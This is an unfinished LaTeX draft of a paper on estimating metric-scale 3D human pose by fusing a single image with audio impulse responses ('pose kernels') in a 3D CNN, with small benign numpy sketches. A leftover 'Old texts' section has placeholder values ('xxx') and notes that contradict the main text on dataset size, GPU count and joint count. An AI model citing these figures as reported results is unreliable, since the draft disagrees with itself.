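As a concrete illustration, probe signals of this kind could be synthesized as follows. This is a minimal Python sketch under our own assumptions: the function names are hypothetical, and the even split of the band into per-speaker sub-bands is one plausible multiplexing scheme (the exact scheme is not specified above).

```python
import numpy as np

FS = 96_000              # field-recorder sample rate (Hz)
DURATION = 0.1           # 100 ms per chirp -> 10 FPS reconstruction
BAND = (19_000, 32_000)  # band recordable by microphones yet inaudible to humans

def make_chirp(f0, f1, fs=FS, duration=DURATION):
    """Linear chirp sweeping from f0 to f1 over `duration` seconds."""
    t = np.arange(int(fs * duration)) / fs
    # instantaneous phase of a linear frequency sweep
    phase = 2.0 * np.pi * (f0 * t + 0.5 * (f1 - f0) / duration * t ** 2)
    return np.sin(phase)

def fdm_chirps(n_speakers=4, band=BAND):
    """Assign each speaker a disjoint sub-band (frequency-division multiplexing)."""
    edges = np.linspace(band[0], band[1], n_speakers + 1)
    return [make_chirp(edges[i], edges[i + 1]) for i in range(n_speakers)]

chirps = fdm_chirps()  # four 100 ms probe signals, one per speaker
```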
We ask participants to perform a wide range of daily activities, e.g., sitting, standing, walking, and drinking, as well as range-of-motion exercises in the environments. To evaluate generalization across heights, our test data include three minors (heights between 140 cm and 150 cm) with consent from their guardians. All personally identifiable information, including faces, is removed from the dataset.
\section{Introduction}
Since the projection of the 3D world onto an image loses scale information, 3D reconstruction of a human's pose from a single image is an ill-posed problem.
To address this limitation, human pose priors have been used in existing lifting approaches~\cite{tome,habibie,chang,pavlakos,yushuke,llopart,li21} to reconstruct the plausible 3D pose given the 2D detected pose by predicting relative depths. The resulting reconstruction, nonetheless, still lacks \textit{metric scale}, i.e., the metric scale cannot be recovered without making an additional assumption such as known height or ground plane contact.
This fundamental limitation of 3D pose lifting precludes applying it to real-world downstream tasks, e.g., smart home facilitation, robotics, and augmented reality, where precise metric measurements of human activities relative to surrounding physical objects are critical.
In this paper, we study the problem of metric human pose reconstruction from a single-view image by incorporating a new sensing modality---audio signals from consumer-grade speakers (Figure~\ref{fig:teaser}). Our insight is that while traversing a 3D environment, the transmitted audio signals undergo a characteristic transformation induced by the geometry of reflective physical objects, including the human body. This transformation is subtle yet highly indicative of the body pose geometry, which can be used to reason about metric scale reconstruction. For instance, the same music playing in a room sounds different depending on the presence or absence of a person, and more importantly, as the person moves.
We parametrize this transformation of audio signals using a time-invariant
transfer function called \textit{pose kernel}---an impulse response of audio induced by a body pose, i.e., the received audio signal is a temporal convolution of the transmitted signal with the pose kernel. Three key properties of the pose kernel enable metric 3D pose lifting in a generalizable fashion: (1)~metric property: its impulse response is equivalent to the arrival time of the reflected audio, and therefore it provides metric distance from the receiver (microphone); (2)~uniqueness: the envelope of the pose kernel is strongly correlated with the location and pose of the target person; (3)~invariance: it is invariant to the geometry of the surrounding environment, which allows us to generalize to unseen environments.
While highly indicative of pose and location of the person in 3D, the pose kernel is a time-domain signal. Integrating it with the spatial-domain 2D pose detection is non-trivial. Further, generalization to new scenes requires precise 3D reasoning where existing audio-visual learning tasks such as source separation in an image domain and image representation learning~\cite{tian2021cyclic,ephrat:2018,gao:2019,owens2018audio} are not applicable.
We address this challenge in 3D reasoning of visual and audio signals, by learning to fuse the pose kernels from multiple microphones and the 2D pose detected from an image, using a 3D convolutional neural network (3D CNN): (1) we project each point in 3D onto the image to encode the likelihood of landmarks (visual features); and (2) we spatially encode the time-domain pose kernel in 3D to form audio features. Inspired by the convolutional pose machine architecture~\cite{wei2016cpm}, a multi-stage 3D CNN is designed to predict the 3D heatmaps of the joints given the visual and audio features. This multi-stage design increases effective receptive field with a small convolutional kernel (e.g., $3\times 3\times 3$) while addressing the issue of vanishing gradients.
In addition, we present a new dataset called \textit{PoseKernel} dataset. The dataset includes more than
10,000 poses from six locations with more than six participants per location,
performing diverse daily activities including sitting, drinking, walking, and jumping.
We use this dataset to evaluate the performance of our metric lifting method and show that it significantly outperforms state-of-the-art lifting approaches, including mesh regression (e.g., FrankMocap~\cite{rong2021frankmocap}) and joint depth regression (e.g., Tome et al.~\cite{tome}). Due to the scale ambiguity of state-of-the-art approaches, their accuracy depends on the height of the target person. In contrast, our approach reliably recovers 3D poses regardless of height, making it applicable not only to adults but also to minors.
\noindent\textbf{Why Metric Scale?} Smart home technology is poised to enter our daily activities, in particular for monitoring fragile populations including children, patients, and the elderly. This requires not only 3D pose reconstruction but also holistic 3D understanding in the context of metric scenes, which allows AI and autonomous agents to respond in a situation-aware manner. While multiview cameras can provide metric reconstruction, the number of cameras required to cover a space grows quadratically with area. Our multi-modal solution mitigates this challenge by leveraging multi-source audio signals (often inaudible) generated by consumer-grade speakers (e.g., Alexa).
\noindent\textbf{Contributions} This paper makes a major conceptual contribution that sheds new light on single-view pose estimation by incorporating audio signals. The technical contributions include (1) a new formulation of the pose kernel as a function of the body pose and location, which generalizes to new scene geometry; (2) a spatial encoding of the pose kernel that facilitates fusing visual and audio features; (3) a multi-stage 3D CNN architecture that can effectively fuse them together; and (4) strong performance of our method, outperforming state-of-the-art lifting approaches by a meaningful margin.
\section{Summary and Discussion} \label{sec:discussion}
This paper presented a new method to reconstruct 3D human body pose at metric scale from a single image by leveraging audio signals. We hypothesized that the audio signals that traverse a 3D space are transformed by the human body pose through reflection, which allows us to recover the 3D metric-scale pose. To validate this hypothesis, we use a human impulse response called the pose kernel, which can be spatially encoded in 3D. With this spatial encoding, we train a 3D convolutional neural network that fuses the 2D pose detection from an image with the pose kernels to reconstruct the 3D metric-scale pose. We showed that our method is highly generalizable: agnostic to the room geometry, the spatial arrangement of camera and speakers/microphones, and the audio source signals.
The main assumption of the pose kernel is that the room is large enough to minimize its shadow effect: in theory, parts of the room impulse response can be canceled by the pose, because the human body can occlude reflections behind the person. This shadow effect is a function of room geometry, and therefore depends on the spatial arrangement of camera and speakers. In practice, we use a room or open space larger than 5 m$\times$5 m, where the impact of the shadow can be neglected.
\section{Method}
We make use of audio signals as a new modality for metric human pose estimation.
We learn a pose kernel that transforms audio signals, which can be encoded in 3D in conjunction with visual pose prediction as shown in Figure~\ref{fig:pose_kernel}.
\subsection{Pose Kernel Lifting}
We cast the problem of 3D pose lifting as learning a function $g_{\boldsymbol{\theta}}$ that predicts a set of 3D heatmaps $\{\mathbf{P}_i\}_{i=1}^N$ given an input image $\mathbf{I} \in [0,1]^{W\times H \times 3}$ where
$\mathbf{P}_i: \mathds{R}^3\rightarrow [0,1]$ is the likelihood of the $i^{\rm th}$ landmark over a 3D space, $W$ and $H$ are the width and height of the image, respectively, and $N$ is the number of landmarks. In other words,
\begin{align}
\{\mathbf{P}_i\}_{i=1}^N = g_{\boldsymbol{\theta}} (\mathbf{I}), \label{Eq:pose}
\end{align}
where $g_{\boldsymbol{\theta}}$ is a learnable function, parametrized by its weights $\boldsymbol{\theta}$, that lifts a 2D image to the 3D pose. Given the predicted 3D heatmaps, the optimal 3D pose is given by $\mathbf{X}^*_i = \underset{\mathbf{X}}{\operatorname{argmax}}~\mathbf{P}_i(\mathbf{X})$, i.e., $\mathbf{X}^*_i$ is the optimal location of the $i^{\rm th}$ landmark. In practice, we use a regular voxel grid to represent $\mathbf{P}$.
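The argmax readout over a voxel-grid heatmap can be sketched as follows; `heatmap_argmax` is a hypothetical helper, and the grid origin and voxel size here are illustrative values.

```python
import numpy as np

def heatmap_argmax(P, origin, voxel=0.05):
    """X* = argmax_X P(X) over a voxel-grid heatmap.

    P      : (Dx, Dy, Dz) likelihood volume for one landmark
    origin : world coordinates of voxel (0, 0, 0)
    voxel  : voxel edge length in meters
    """
    idx = np.unravel_index(np.argmax(P), P.shape)
    return np.asarray(origin, dtype=float) + voxel * np.asarray(idx, dtype=float)

# toy heatmap with its peak at voxel (2, 3, 1)
P = np.zeros((4, 4, 4))
P[2, 3, 1] = 1.0
X_star = heatmap_argmax(P, origin=(0.0, 0.0, 0.0))
```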
We extend Equation~(\ref{Eq:pose}) by leveraging audio signals to reconstruct a metric scale human pose, i.e.,
\begin{align}
\{\mathbf{P}_i\}_{i=1}^N = g_{\boldsymbol{\theta}} (\mathbf{I}, \{k_j(t)\}_{j=1}^M), \label{Eq:time}
\end{align}
where $k_j(t)$ is the \textit{pose kernel} heard from the $j^{\rm th}$ microphone---a time-invariant audio impulse response with respect to human pose geometry that transforms the transmitted audio signals, as shown in Figure~\ref{fig:pose_kernel}. $M$ denotes the number of received audio signals\footnote{The number of audio sources (speakers) does not need to match with the number of received audio signals (microphones).}.
The pose kernel transforms the transmitted waveform as follows:
\begin{align}
r_j(t) = s(t) * (\overline{k}_j(t) + k_j(t)),
\end{align}
where $*$ is the operation of time convolution, $s(t)$ is the transmitted source signal and $r_j(t)$ is the received signal at the location of the $j^{\rm th}$ microphone. $\overline{k}_j(t)$ is the empty room impulse response that accounts for transformation of the source signal due to the static scene geometry, e.g., wall and objects, in the absence of a person. $k_j(t)$ is the pose kernel measured at the $j^{\rm th}$ microphone location that accounts for signal transformation due to human pose.
The pose kernel can be obtained using the inverse Fourier transform, i.e.,
\begin{align}
k_j(t) = \mathcal{F}^{-1} \{K_j(f)\},~~~K_j(f) = \frac{R_j(f)}{S(f)} - \overline{K}_j(f),
\end{align}
where $\mathcal{F}^{-1}$ is the inverse Fourier transform, and $R_j(f)$, $S(f)$, and $\overline{K}_j(f)$ are the frequency responses of $r_j(t)$, $s(t)$, and $\overline{k}_j(t)$, respectively, e.g., $R_j(f) = \mathcal{F}\{r_j(t)\}$.
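This computation is a frequency-domain deconvolution; a minimal numerical sketch follows. The regularizer \texttt{eps} is our own addition, needed in practice so that near-zero spectral bins of $S(f)$ (e.g., outside the chirp band) do not blow up the division; the text does not specify such a step.

```python
import numpy as np

def pose_kernel(r, s, k_empty, eps=1e-8):
    """Estimate k_j(t) = F^{-1}{ R_j(f)/S(f) - Kbar_j(f) } by deconvolution.

    r, s, k_empty : received signal, source signal, and empty-room impulse
                    response, all sampled at the same rate and of equal length.
    eps           : small regularizer stabilizing the division R/S at
                    near-zero spectral bins of S (our own assumption).
    """
    n = len(r)
    R = np.fft.rfft(r, n)
    S = np.fft.rfft(s, n)
    # regularized division R/S, then subtract the empty-room response
    K = R * np.conj(S) / (np.abs(S) ** 2 + eps) - np.fft.rfft(k_empty, n)
    return np.fft.irfft(K, n)
```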
Since the pose kernel is dominated by direct reflection from the body, it is agnostic to scene geometry%
\footnote{
The residual after subtracting the room response still includes multi-path effects involving the body. However, we observe that such effects are negligible in practice, and the pose kernel is dominated by the direct reflection from the body. Therefore, it is agnostic to scene geometry. See Section~\ref{sec:discussion} for a discussion of the multi-path shadow effect.}. The scene geometry is factored out by the empty room impulse response $\overline{k}_j(t)$, and the source audio $s(t)$ is divided out of the received audio $r_j(t)$, which allows us to generalize the learned $g_{\boldsymbol{\theta}}$ to various scenes.
\subsection{Spatial Encoding of Pose Kernel}
We encode the time-domain pose kernel of the $j^{\rm th}$ microphone, $k_j(t)$, in the 3D spatial domain, where audio and visual signals can be fused.
A transmitted audio at the speaker's location $\mathbf{s}_{\rm spk}\in \mathds{R}^3$ is reflected by the body surface at $\mathbf{X}\in \mathds{R}^3$ and arrives at the microphone's location $\mathbf{s}_{\rm mic}\in \mathds{R}^3$. The arrival time is:
\begin{align}
t_{\mathbf{X}} = \frac{\|\mathbf{s}_{\rm spk} - \mathbf{X}\|+\|\mathbf{s}_{\rm mic} - \mathbf{X}\|}{v}, \label{Eq:delay}
\end{align}
where $t_{\mathbf{X}}$ is the arrival time and $v$ is the (constant) speed of sound (Figure~\ref{Fig:spatial_encoding}).
The pose kernel is a superposition of impulse responses from the reflective points in the body surface, i.e.,
\begin{align}
k_j(t) = \sum_{\mathbf{X}\in \mathcal{X}} A(\mathbf{X}) \delta(t-t_{\mathbf{X}}), \label{Eq:reflector}
\end{align}
where $\delta(t-t_{\mathbf{X}})$ is the Dirac delta function (impulse response) at $t= t_{\mathbf{X}}$. $t_{\mathbf{X}}$ is the arrival time of the audio signal reflected by the point $\mathbf{X}$ on the body surface $\mathcal{X}$. $A(\mathbf{X})$ is the reflection coefficient (gain) at $\mathbf{X}$.
Equations~(\ref{Eq:delay}) and (\ref{Eq:reflector}) imply two important spatial properties of the pose kernel. (i)
Since the locus of points whose sum of distances to the microphone and the speaker is constant forms an ellipsoid, Equation~(\ref{Eq:delay}) implies that the same impulse response can be generated by any point on this ellipsoid.
(ii) Due to the constant speed of sound, the response of the arrival time can be interpreted as that of the spatial distance by evaluating the pose kernel at the corresponding arrival time, $t_{\mathbf{X}}$:
\begin{align}
\mathcal{K}_j(\mathbf{X}) = k_j(t)|_{t = t_{\mathbf{X}}},
\label{Eq:encoding}
\end{align}
where $\mathcal{K}_j(\mathbf{X})$ is the spatial encoding of the pose kernel at $\mathbf{X}\in \mathds{R}^3$.
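Equations~(\ref{Eq:delay})--(\ref{Eq:encoding}) can be sketched numerically as follows; the nearest-sample lookup of the arrival time and the fixed speed of sound are our own simplifying assumptions, and the helper name is hypothetical.

```python
import numpy as np

V_SOUND = 343.0  # speed of sound (m/s)

def spatial_encode(k, fs, points, s_spk, s_mic, v=V_SOUND):
    """K_j(X) = k_j(t)|_{t = t_X}, with t_X = (|s_spk - X| + |s_mic - X|) / v.

    k            : sampled pose kernel, k[n] = k_j(n / fs)
    points       : (P, 3) array of 3D query points X
    s_spk, s_mic : speaker and microphone locations, shape (3,)
    """
    d = np.linalg.norm(points - s_spk, axis=1) + np.linalg.norm(points - s_mic, axis=1)
    # nearest-sample arrival time, clipped to the kernel's support
    idx = np.clip(np.round(d / v * fs).astype(int), 0, len(k) - 1)
    return k[idx]
```

Note that any two points with the same distance sum, i.e., on the same ellipsoid with foci $\mathbf{s}_{\rm spk}$ and $\mathbf{s}_{\rm mic}$, receive the same encoded value, which is exactly the bearing ambiguity discussed above.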
\setlength{\columnsep}{10pt}
\begin{wrapfigure}{r}{0.4\linewidth}
\vspace{-9mm}
\begin{center}
\includegraphics[width=1\linewidth]{geom.pdf}
\end{center}
\vspace{-5mm}
\caption{Pose kernel spatial encoding.}
\label{Fig:spatial_encoding}
\vspace{-5mm}
\end{wrapfigure}
Let us illustrate the spatial encoding of the pose kernel. Consider a point object $\mathbf{X} \in \mathds{R}^2$ that reflects an audio signal from the speaker $\mathbf{s}_{\rm spk}$, which is received by the microphone $\mathbf{s}_{\rm mic}$ as shown in Figure~\ref{Fig:spatial_encoding}. The received audio is delayed by $t_{\mathbf{X}}$, which can be represented as a pose kernel $k(t) = A(\mathbf{X})\delta (t-t_{\mathbf{X}})$. This pose kernel can be spatially encoded as $\mathcal{K}(\mathbf{X})$ because the speed of sound is constant. Note that there exist infinitely many possible locations of $\mathbf{X}$ given the pose kernel, because any point
(e.g., $\widehat{\mathbf{X}}$) on the dotted ellipse has a constant sum of distances from the speaker and microphone.
\begin{figure}[t]
\begin{center}
\subfigure[Empty room response]{\label{fig:empty}\includegraphics[width=0.85\linewidth]{toy1.pdf}}\\\vspace{-3mm}
\subfigure[Object response]{\label{fig:object}\includegraphics[width=0.85\linewidth]{toy2.pdf}}\\\vspace{-3mm}
\subfigure[Rotated object response]{\label{fig:rotate}\includegraphics[width=0.85\linewidth]{toy3.pdf}}\\\vspace{-3mm}
\subfigure[Translated object response]{\label{fig:translate}\includegraphics[width=0.85\linewidth]{toy4.pdf}}
\end{center}
\vspace{-7mm}
\caption{Visualization of the spatial encoding (left column) of the time-domain impulse response (right column) through a sound simulation. Elliptical patterns whose focal points coincide with the locations of the speaker and microphone can be observed in the spatial encoding. (a) The empty room impulse response. (b) When an object is present, a strong impulse response reflected by the object surface can be observed; we show the full responses, which include the pose kernel. (c) When the object rotates, the kernel response changes. (d) When the object translates, the pose kernel is delayed. }
\label{fig:encoding_pose_kernel}
\vspace{-5mm}
\end{figure}
Figure \ref{fig:encoding_pose_kernel} illustrates (a) the empty room impulse response and (b,c,d) the full responses with the pose kernels by varying the location and pose of an object.
The left column shows the pose kernel $k_j(t)$ encoded to the physical space, while the right column shows the actual signal.
Because the audio signal carries no bearing information, each peak in the pose kernel $k_j(t)$ corresponds to possible reflector locations on an ellipse whose focal points coincide with the locations of the speaker and microphone.
With the spatial encoding of the pose kernel, we reformulate Equation~(\ref{Eq:time}):
\begin{align}
\{\mathbf{P}_i(\mathbf{X})\}_{i=1}^N = g_{\boldsymbol{\theta}} (\phi_v(\mathbf{X};\mathbf{I}),~~ \underset{j}{\operatorname{max}}~ \phi_a(\mathcal{K}_j(\mathbf{X}))), \label{Eq:space}
\end{align}
where $\phi_v$ and $\phi_a$ are the feature extractors for visual and audio signals, respectively.
\begin{figure*}[t]
\centering
\includegraphics[width=\linewidth]{network}
\caption{We design a 3D convolutional neural network to encode pose kernels (audio) and 2D pose detection (image) to obtain the 3D metric reconstruction of a pose. We combine audio and visual features using a series of convolutions (audio features from multiple microphones are fused via max-pooling.). The audio visual features are convolved with a series of $3\times 3\times 3$ convolutional kernels to predict the set of 3D heatmaps for joints. We use multi-stage prediction, inspired by the convolutional pose machine architecture~\cite{wei2016cpm}, which can effectively increase the receptive field while avoiding vanishing gradients. }
\label{fig:architecture}
\vspace{-0.05in}
\end{figure*}
Specifically, $\phi_v$ comprises the visual features evaluated at the projected location of $\mathbf{X}$ in the image $\mathbf{I}$, i.e.,
\begin{align}
\phi_v(\mathbf{X};\mathbf{I}) = \{\mathbf{p}_i(\Pi \mathbf{X})\}_{i=1}^N,
\end{align}
where $\mathbf{p}_i \in [0,1]^{W\times H}$ is the likelihood of the $i^{\rm th}$ landmark in the image $\mathbf{I}$. $\Pi$ is the operation of 2D projection, i.e., $\mathbf{p}_i(\Pi \mathbf{X})$ is the likelihood of the $i^{\rm th}$ landmark at 2D projected location $\Pi \mathbf{X}$.
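The sampling of the 2D likelihoods at $\Pi \mathbf{X}$ can be sketched as follows. As an assumption for illustration, $\mathbf{X}$ is expressed in the camera frame and $\Pi$ is realized by an intrinsic matrix (the full projection would also include the camera extrinsics); the helper name is hypothetical.

```python
import numpy as np

def visual_feature(X, heatmaps, K_int):
    """phi_v(X; I): sample each 2D joint heatmap p_i at the projection Pi(X).

    X        : (3,) point in the camera coordinate frame (Z > 0)
    heatmaps : (N, H, W) 2D landmark likelihoods p_i (e.g., 2D detector output)
    K_int    : (3, 3) camera intrinsic matrix
    """
    u, v, w = K_int @ X
    col, row = int(round(u / w)), int(round(v / w))  # pinhole projection Pi(X)
    N, H, W = heatmaps.shape
    if not (0 <= row < H and 0 <= col < W):
        return np.zeros(N)  # the point projects outside the image
    return heatmaps[:, row, col]
```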
$\phi_a(\mathcal{K}_j(\mathbf{X}))$ is the audio feature from the $j^{\rm th}$ pose kernel evaluated at $\mathbf{X}$. We use the max-pooling operation to fuse multiple received audio signals, which is agnostic to location and ordering of audio signals.
This facilitates scene generalization where the learned audio features can be applied to a new scene with different audio configurations (e.g., the number of sources, locations, scene geometry).
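A minimal sketch of this order-invariant fusion; the tensor shapes are illustrative, and `fuse_audio_features` is a hypothetical helper.

```python
import numpy as np

GRID = (70, 70, 50)  # voxel grid used in our implementation
VOXEL = 0.05         # 5 cm voxels -> 3.5 m x 3.5 m x 2.5 m working volume

def fuse_audio_features(per_mic_features):
    """Fuse per-microphone audio features with max-pooling.

    per_mic_features : (M, C, Dx, Dy, Dz) features from M microphones.
    The max over the microphone axis is invariant to the number and the
    ordering of microphones, so the network cannot memorize the sensor layout.
    """
    return per_mic_features.max(axis=0)
```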
We learn $g_{\boldsymbol{\theta}}$ and $\phi_a$ by minimizing the following loss:
\begin{align}
\mathcal{L} = \sum_{\mathbf{I},\mathcal{K}, \widehat{\mathbf{P}}\in \mathcal{D}} \|g_{\boldsymbol{\theta}} (\phi_v,~ \underset{j}{\operatorname{max}}~ \phi_a(\mathcal{K}_j)) - \{\widehat{\mathbf{P}}_i\}_{i=1}^N\|^2,
\end{align}
where $\{\widehat{\mathbf{P}}_i\}_{i=1}^N$ is the ground truth 3D heatmaps, and $\mathcal{D}$ is the training dataset. Note that this paper focuses on the feasibility of metric lifting by using audio signals where we use an off-the-shelf human pose estimator $\{\mathbf{p}_i\}_{i=1}^N$~\cite{8765346}.
\subsection{Network Design and Implementation Details}
We design a 3D convolutional neural network (3D CNN) to encode the 2D pose detection from an image (using OpenPose~\cite{8765346}) and four audio signals from the microphones. Inspired by the design of the convolutional pose machine~\cite{wei2016cpm}, the network is composed of six stages that increase the receptive field while avoiding the issue of vanishing gradients. The 2D pose detection is represented by a set of heatmaps that are encoded in a $70\times 70\times 50$ voxel grid via inverse projection, which forms 16-channel 3D heatmaps. The pose kernel from each microphone is spatially encoded over a $70\times 70\times 50$ voxel grid and convolved with three 3D convolutional filters, followed by max-pooling across the four audio channels. Each voxel is 5 cm wide, resulting in a 3.5 m$\times$3.5 m$\times$2.5 m space. These audio features are combined with the visual features to form audio-visual features, which are transformed by a set of 3D convolutions to predict the 3D heatmaps for each joint. The prediction, in turn, is combined with the audio-visual features to form the next stage's prediction.
The network architecture is shown in Figure \ref{fig:architecture}.
We implement the network in PyTorch and train it on a server with four Tesla V100 GPUs, using the SGD optimizer with a learning rate of 1. The model is trained for 70 epochs (around 36 hours) until convergence.
\section{Old texts}
\section{Dataset}
* We collected synchronized audio and vision data in 6 different environments across 6 different people.
* Data is recorded using a Zoom F8n field recorder with commercial speakers and mics.
* Each person is asked to perform daily tasks in the environments while our audio and vision sensors are recording.
* In all environments, audio sensor and camera are registered to the same environment using colmap.
* The result is a dataset consisting of 5000 frames
\section{Implementation}
* We train using a batch size of xxx, and learning rate of xxx.
* Data is being trained on a server with 8xv100 GPUs for xx hours.
\section{Evaluation}
* We perform different kinds of test showing that our algorithm is working across different environments
* We compare with a baseline where no audio sensor is used, and conducted an ablation study showing the performance gain with an increased number of audio sensors
In this section, we will elaborate on how the audio impulse response is related to geometry, and how we eventually encode audio responses into 3D space for pose landmark likelihood estimation. We will start from a simple example illustrating how audio changes with respect to geometry, and then dive into the mathematics behind it.
\textbf{Will sound change according to geometry (or pose)?}
Consider a simple example where a cubic object is placed in a room.
We use a speaker to emit a signal towards the object, and a microphone to capture the signal bouncing off the object and the room, as shown in figure \ref{fig:encoding_pose_kernel}.
We rotate the object around its center and plot the \textit{cross correlation} value between the received signals when (1) the object is at pose $\theta$ ($R(\theta)$) and (2) the object is at the initial pose $\theta_0$ ($R(\theta_0)$).
We can see that the cross correlation changes with the pose $\theta$.
\begin{figure}[hbt]
\centering
\vspace{-0.05in}
\includegraphics[width=\linewidth]{dummy.pdf}
\vspace{-0.25in}
\caption{(a) Simulation scenario, (b) Signal cross correlation value changes with respect to pose $\theta$}
\label{fig:encoding_pose_kernel}
\vspace{-0.05in}
\end{figure}
This is because different object poses create different reflection profiles (or echoes) of the sound, leading to variation in the signal received by the microphone.
\textbf{Inferring geometry from sound:}
Now let us bring more maths to the problem.
We first consider an open space without room echos.
Assume the speaker is placed at location $P_s$, and microphone is placed at location $P_m$.
Denote the transmitted sound from speaker as $s(t)$ and received sound captured from microphone as $r(t)$.
As discussed in Section 3.1, we can estimate the impulse response $k(t)$ caused by sound reflections by deconvolving $r(t)$ with $s(t)$.
As shown in figure \ref{fig:impulse}(a), there are a number of peaks in the impulse response $k(t)$. We use a Dirac delta function $\delta(t-t_i)$ to represent each peak at time $t = t_i$.
Thus the impulse response can be represented as:
\begin{equation}
k(t) = \sum_{i = 1} ^N A_i \cdot\delta(t - t_i)
\end{equation}
where $A_i$ is the amplitude of the peak, and $N$ is the total number of peaks.
\begin{figure}[hbt]
\centering
\vspace{-0.05in}
\includegraphics[width=\linewidth]{dummy.pdf}
\vspace{-0.25in}
\caption{(a) Impulse response illustration. (b) A peak in the impulse response corresponds to a potential reflector on the ellipse.}
\label{fig:impulse}
\vspace{-0.05in}
\end{figure}
A given peak $A_i \delta(t-t_i)$ at time $t = t_i$ corresponds to one reflection path of the audio signal: after convolution with the original source signal $s(t)$, it produces a delayed and attenuated copy of $s(t)$, i.e., an echo $s^i(t)$, where
\begin{equation}
s^i(t) = A_i \delta(t - t_i) * s(t) = A_i s(t - t_i)
\end{equation}
This means each peak $A_i \delta(t-t_i)$ in the impulse response $k$ corresponds to a signal path with time-of-flight equal to $t_i$.
Basic physics then tells us that the total distance traveled from the speaker to the reflector to the microphone is
\begin{equation}
\label{equation:distance}
d_{im} + d_{is} = t_i \cdot v
\end{equation}
where $v$ is the speed of sound, and $d_{im}$ and $d_{is}$ are the distances from the $i^{\rm th}$ reflector to the microphone and the speaker, respectively.
This implies that the reflector lies on an ellipse with the speaker and microphone at the two foci, as shown in figure \ref{fig:impulse}(b).
Then let us consider the case where the reflector is inside a room.
By measuring with and without the person, we obtain two impulse responses $k(t)$ and $k_0(t)$; their subtraction gives the human-related impulse response $k_j(t)$ (measured at the $j^{\rm th}$ speaker-microphone pair) as:
\begin{equation}
k_j(t) = k(t) - k_0(t)
\end{equation}
Finally, by applying the physics of equation \ref{equation:distance}, we connect this human-related impulse response $k_j$ with the human pose geometry.
\textbf{Spatial encoding of audio impulse response:}
We encode the audio impulse response in 3D, creating an audio heatmap $W_j\in [0,1]^{D\times D\times D}$ in the physical frame (discretized into $D\times D\times D$ voxels), according to the audio-geometry relationship above.
One important thing to note, however, is that, unlike vision, the speaker and microphone that we use do not offer bearing information. Any point in the 3D space with the same distance to the speaker/mic pair will provide exactly the same time-of-flight, and thus contributes exactly the same to the audio impulse response.
To fully recover this omni-directional characteristic, we use the following method for data encoding:
Assume the microphone is located at $P_{jm}(x_m,y_m,z_m)$ and the speaker at $P_{js}(x_s,y_s,z_s)$ in the global frame.
Then for any given point $P(x,y,z)$, the 3D heatmap value $W_j(x, y, z)$ would be:
\begin{equation}
W_j(x, y, z) = k_j((d_{jm} + d_{js}) / v)
\end{equation}
where $k_j$ is the human-related impulse response, and $d_{jm}$ and $d_{js}$ are the distances between the point $P$ and the microphone and speaker locations, i.e.,
\begin{align}
d_{jm} &= ||(x,y,z)-(x_m,y_m,z_m)||_2 \\
d_{js} &= ||(x,y,z)-(x_s,y_s,z_s)||_2
\end{align}
\textbf{Spatial encoding of vision data:}
Vision data is encoded similarly, based on a propagation model.
The major difference, however, is that a vision ray is directional but offers no timing information.
A fusion of audio and vision can therefore provide both bearing and depth, and thus a 3D human pose.
Recall that for any given image, each pixel on the 2D image corresponds to one ray in the 3D space, obtained from camera intrinsic matrix.
We use OpenPose \cite{openpose} to obtain the 2D locations of 15 joints on the human body.
These 15 2D joint locations are then back-projected into 3D space to form 15 rays.
Any given point on each of these rays is a possible 3D joint location.
For the purpose of data smoothing, we use a Gaussian representation of the ray to create a 3D heatmap.
Finally, after encoding audio and vision data to the 3D space, we directly regress joint heatmap from this 3D space.
\subsection{Objective function and Implementation}
We use 3D CNNs as building blocks to directly regress the pose from the $D\times D\times D$ heatmaps for audio and vision.
A multi-stage 3D CNN pipeline is proposed, and shortcuts are introduced to prevent potential vanishing gradients.
We also adopt a max-pooling layer for the audio signals after audio feature extraction, so that the network does not memorize the audio sensor ordering, for the sake of generalizability.
We estimate the heatmaps for each of the joints, and a mean-squared loss is computed at the end of each stage.
The final loss is the sum of all losses for each stage:
\begin{equation}
L = \sum_{i = 1}^N L_i
\end{equation}
\subsection{Overview}
Single-view human pose lifting is the problem of estimating a 3D human pose from a 2D image, defined by the following equation, where $X$ is the 3D human pose and $I$ is the 2D image:
\begin{equation}
\label{equ:problem_orig}
X = f(I)
\end{equation}
Due to the lack of depth information, an infinite number of poses can match the 2D image; in other words, this is an ill-posed problem.
Sound, given its relatively slow speed of propagation, offers a unique opportunity of distance estimation.
Imagine we have a couple of speakers and microphones in the environment.
By emitting sound from speakers and collecting signals reflected off human body at the microphone side, we can estimate the time-of-flight of sound, which can translate to depth measurement (for each body joint).
While theoretically plausible, there are, of course, many challenges given the dispersive nature of sound, which causes heavy multipath, especially in indoor environments.
This paper focuses on tackling these challenges and including a new modality, audio $A$, in the pipeline of 3D pose estimation, mathematically denoted as:
\begin{equation}
\label{equ:problem_our}
X = f(I, A)
\end{equation}
More specifically, to extract as much spatial information as we can from audio, we deployed multiple audio sensors (speakers and microphones) around the environment, giving us $k$ different audio measurements $A_1, A_2, ..., A_k$ for each pose:
\begin{equation}
\label{equ:problem_our_multi}
X = f(I, A_1, A_2, ..., A_k)
\end{equation}
A signal processing pipeline $h(\cdot)$ is proposed to effectively cope with indoor audio multipath and encode the 1D audio data into the 3D heatmap space.
Similarly, vision information is also encoded to 3D space through a function $g(\cdot)$:
\begin{equation}
\label{equ:problem_our_specific}
X = f(g(I), h(A_1), h(A_2), ..., h(A_k))
\end{equation}
Finally a 3D CNN is trained on the audio and vision 3D heatmaps to regress human joint locations.
In the rest of this section, we will first give an experimental study showing the feasibility of the idea from the signal's perspective.
Then we will elaborate on each component of the pipeline, especially how we design $f$, $g$, and $h$.
Let us start with the feasibility study.
\subsection{Feasibility study: can audio infer geometry?}
\textbf{Acoustic simulation result:}
\textbf{Real world toy example:}
Now let us move to the real world experiment of human pose estimation.
We ask the person to stand still in the same location, while doing different poses.
Similarly, we also record the \textit{cross correlation} value $xcorr$ between two human poses $P_1$ and $P_2$.
We ask the person to perform a fixed list of poses multiple times.
Table \ref{table:toy} shows the result.
It is evident that for the same pose the xcorr value is high, while for different poses it is low.
This implies the promise of using audio as a method for pose estimation.
\subsection{How to infer geometry: signal processing background}
However, most of the time the echoes are merged with the original sound signal, making them difficult to interpret.
To extract the reflection profile (or, more technically, the time-domain impulse response $h$), we perform a deconvolution between the received signal $R$ and the source signal $S$ \cite{}.
\begin{equation}
h = R *^{-1} S
\end{equation}
In an ideal case with no multipath reflection, each object in the environment corresponds to one Dirac delta function in the impulse response.
Assuming the speaker and microphone are co-located and synchronized, the locations of the peaks exactly represent the time-of-flight to each object.
